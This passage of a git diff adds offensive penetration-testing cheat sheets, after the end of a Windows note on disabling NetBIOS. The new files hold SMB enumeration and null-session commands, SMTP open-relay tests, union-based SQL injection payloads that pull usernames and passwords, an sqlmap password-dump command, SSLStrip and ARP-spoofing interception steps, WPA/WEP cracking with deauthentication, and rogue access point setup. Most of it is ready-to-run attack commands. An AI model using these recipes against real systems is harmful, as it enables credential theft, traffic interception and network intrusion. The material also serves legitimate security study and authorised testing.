of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially “deprecated” NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you won’t be able to establish a forest trust between two Windows Server 2003 forests. +But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be effected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. alternatively, you can get away with, at the very least, disabling Netbios on your workstations. +See below for step by step instructions on disabling Netbios on workstations: + +Windows XP, Windows Server 2003, and Windows 2000 +On the desktop, right-click My Network Places, and then click Properties. +Right-click Local Area Connection, and then click Properties +In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), clickAdvanced, and then click the WINS tab.Note In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list. +Click Use NetBIOS setting from the DHCP server, and then click OK three times. + +For Windows Vista +On the desktop, right-click Network, and then click Properties. +Under Tasks, click Manage network connections. +Right-click Local Area Connection, and then click Properties +In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab. +Click Use NetBIOS setting from the DHCP server, and then click OK three times. + +For Windows 7 +Click Start, and then click Control Panel. +Under Network and Internet, click View network status and tasks. +Click Change adapter settings. +Right-click Local Area Connection, and then click Properties. +In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab. +Click Use NetBIOS setting from the DHCP server, and then click OK three times. \ No newline at end of file diff --git a/Cheatsheet_SMBEnumeration.txt b/Cheatsheet_SMBEnumeration.txt new file mode 100644 index 0000000..ee46260 --- /dev/null +++ b/Cheatsheet_SMBEnumeration.txt @@ -0,0 +1,35 @@ +SMB Enumeration Techniques using Backtrack: + +1. NBTSCAN + +root@bt:~# nbtscan -r 10.0.2.0/24 +Doing NBT name scan for addresses from 10.0.2.0/24 + +IP address NetBIOS Name Server User MAC address +------------------------------------------------------------------------------ +10.0.2.0 Sendto failed: Permission denied +10.0.2.10 +10.0.2.15 METASPLOITABLE METASPLOITABLE 00-00-00-00-00-00 +10.0.2.18 TEST01 TEST01 00-11-21-22-1d-4d +10.0.2.45 TEST04 TEST04 00-12-d2-34-11-55 + +2. NMAP + +nmap -p 1-65535 -T4 -O -A -v 10.0.2.15 + +3. SMBCLIENT + +root@bt:~# smbclient -L=10.0.2.15 + +Null Sessions + +root@bt:~# smbclient \\\\10.0.2.15\\tmp +Enter root's password: +Anonymous login successful + + +SMB Enumeration Techniques using Windows Tools: + +1. NetBIOS Enumerator (nbtenum) + +http://nbtenum.sourceforge.net/ \ No newline at end of file diff --git a/Cheatsheet_SMTPOpenRelay.txt b/Cheatsheet_SMTPOpenRelay.txt new file mode 100644 index 0000000..dda1dba --- /dev/null +++ b/Cheatsheet_SMTPOpenRelay.txt @@ -0,0 +1,8 @@ +[+] SMTP Open Relay Commands + +[-] ncat -C 86.54.23.178 25 +[-] HELO mail.co.uk +[-] MAIL FROM: +[-] RCPT TO: +[-] DATA +Test Email \ No newline at end of file diff --git a/Cheatsheet_SQLInjection.txt b/Cheatsheet_SQLInjection.txt new file mode 100644 index 0000000..f6e0d4d --- /dev/null +++ b/Cheatsheet_SQLInjection.txt @@ -0,0 +1,20 @@ +[+] Union Based SQL Injection + +' or 1=1# + +1' ORDER BY 10# + +1' UNION SELECT version(),2# + +1' UNION SELECT version(),database()# + +1' UNION SELECT version(),user()# + +1' UNION ALL SELECT table_name,2 from information_schema.tables# + +1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"# + +1' UNION ALL SELECT concat(user,char(58),password),2 from users# + + +sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs \ No newline at end of file diff --git a/Cheatsheet_SSLStrip.txt b/Cheatsheet_SSLStrip.txt new file mode 100644 index 0000000..bdec2bf --- /dev/null +++ b/Cheatsheet_SSLStrip.txt @@ -0,0 +1,10 @@ +1) Flip your machine into forwarding mode (as root): +echo "1" > /proc/sys/net/ipv4/ip_forward + +2) Setup iptables to intercept HTTP requests (as root): +iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 + +3) sslstip.py -l 8080 -f lock.ico + +4) Run arpspoof to redirect traffic to your machine (as root): +arpspoof -i -t \ No newline at end of file diff --git a/Cheatsheet_WirelessTesting.txt b/Cheatsheet_WirelessTesting.txt new file mode 100644 index 0000000..4b0514d --- /dev/null +++ b/Cheatsheet_WirelessTesting.txt @@ -0,0 +1,66 @@ +WPA PSK attack with aircrack-ng suite. +-------------------------------------- + +Place your wireless card into Monitor Mode +airmon-ng start wlan0 + +Detect all available wireless AP’s and clients +airodump-ng mon0 + +Setting adapter channel +iwconfig mon0 channel + +Capturing the four-way handshake +airodump-ng --channel --bssid --write capture mon0 + +You can capture the handshake passively (it takes time) or de-authenticate a client. + +De-authentication attack +aireplay-ng --deauth 3 -a -c mon0 + +Deauth every client - aireplay-ng -0 5 -a mon0 + +Dictionary Attack +aircrack-ng -w passwords.lst capture-01.cap + +Brute force Attack +crunch 8 8 0123456789 | aircrack-ng -e "Name of Wireless Network" -w - /root/home/wpa2.eapol.cap + + +WEP attack with aircrack-ng suite. +---------------------------------- + +Place your wireless card into Monitor Mode +airmon-ng start wlan0 + +Detect all available wireless AP’s and clients +airodump-ng mon0 + +Setting adapter channel +iwconfig mon0 channel + +airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface) + +aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface) + +aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface) + +aircrack-ng -b (bssid) (file name-01.cap) + + +Rogue Access Point Testing +-------------------------- + +# ifconfig wlan0 down +# iw reg set BO +# iwconfig wlan0 txpower 0 +# ifconfig wlan0 up +# airmon-ng start wlan0 +# airodump-ng --write capture mon0 + +root@backbox:/home/backbox# ifconfig wlan1 down +root@backbox:/home/backbox# iw reg set BO +root@backbox:/home/backbox# ifconfig wlan1 up +root@backbox:/home/backbox# iwconfig wlan1 channel 13 +root@backbox:/home/backbox# iwconfig wlan1 txpower 30 +root@backbox:/home/backbox# iwconfig wlan1 rate 11M auto \ No newline at end of file